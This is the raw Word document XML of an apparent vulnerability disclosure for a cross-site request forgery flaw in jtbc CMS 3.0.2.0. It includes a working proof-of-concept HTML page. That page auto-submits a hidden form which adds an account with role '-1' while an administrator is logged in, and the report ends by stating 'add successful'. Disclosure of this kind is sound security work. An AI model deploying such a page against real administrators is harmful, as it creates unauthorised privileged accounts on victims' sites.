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93F4" w14:textId="79CD03CD" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26880">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JBTC CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64623C56" w14:textId="4DFE4661" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26880">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>link:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="000F74AC">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://github.com/jetiben/jtbc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54502106" w14:textId="6F9E1981" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>version: 3.0.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F455264" w14:textId="7847FF1D" w:rsidR="00F50A1E" w:rsidRPr="00C26880" w:rsidRDefault="00F50A1E" w:rsidP="00C95D06">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5088"/>
        </w:tabs>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>After administrator logged in, open the this page</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="33411453" w14:textId="33120D70" w:rsidR="008665BD" w:rsidRDefault="008665BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r w:rsidR="00C26880">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00110AE2" w14:textId="64C5AB02" w:rsidR="008665BD" w:rsidRDefault="00C26880">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C5457D0" wp14:editId="5B0187DA">
            <wp:extent cx="5274310" cy="3684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C87A" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B2AC0A" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467ECC8E" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A4406" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:tab/>
        <w:t>&lt;title&gt;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329044E4" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AFA6D5" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A02892" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:tab/>
        <w:t>&lt;form action="http://127.0.0.1/console/account/manage.php?type=action&amp;action=add" method="POST" id="csrf" name="csrf" onload="go()"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F415828" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;input type="hidden" name="username" value="example"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DFDEAF" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;input type="hidden" name="password" value="example"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6EA5A1" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;input type="hidden" name="cpassword" value="example"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D50B52" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;input type="hidden" name="role" value="-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5220301D" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;input type="hidden" name="email" value="example@gmail.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E2B4E2" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:tab/>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F420E9B" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:tab/>
        <w:t>&lt;script language="JavaScript" type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7437153D" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>document.csrf.submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0036C990" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:tab/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DF4B4A" w14:textId="77777777" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3E4C63" w14:textId="215835A5" w:rsidR="00C26880" w:rsidRDefault="00C26880" w:rsidP="00C26880">
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B057649" w14:textId="51A54B7B" w:rsidR="009C5FF1" w:rsidRDefault="00C26880">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2105939B" wp14:editId="5B5D01B8">
            <wp:extent cx="5274310" cy="4934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D7D55" wp14:editId="041A0F54">
            <wp:extent cx="5274310" cy="4934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384" w14:textId="175FA9D6" w:rsidR="009C5FF1" w:rsidRDefault="00C26880">
      <w:r>
        <w:t xml:space="preserve">add </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26880">
        <w:t>successful</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009C5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ED56" w14:textId="77777777" w:rsidR="00BA577A" w:rsidRDefault="00BA577A" w:rsidP="00C26880">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="22D1CD45" w14:textId="77777777" w:rsidR="00BA577A" w:rsidRDefault="00BA577A" w:rsidP="00C2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9DFB" w14:textId="77777777" w:rsidR="00BA577A" w:rsidRDefault="00BA577A" w:rsidP="00C26880">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7D1FDFAE" w14:textId="77777777" w:rsidR="00BA577A" w:rsidRDefault="00BA577A" w:rsidP="00C2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29"/>
    <w:rsid w:val="0001154B"/>
    <w:rsid w:val="004F0729"/>
    <w:rsid w:val="008665BD"/>
    <w:rsid w:val="00905FEE"/>
    <w:rsid w:val="009C5FF1"/>
    <w:rsid w:val="00BA577A"/>
    <w:rsid w:val="00C26880"/>
    <w:rsid w:val="00C95D06"/>
    <w:rsid w:val="00CF28DC"/>
    <w:rsid w:val="00E03E64"/>
    <w:rsid w:val="00F5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4374"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A345D590-CA45-4C98-A28F-1A6212C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68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6880"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C268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jetiben/jtb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637D-FD31-4919-882C-9CCB621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B</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>HBB</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-08-19T03:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-19T07:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>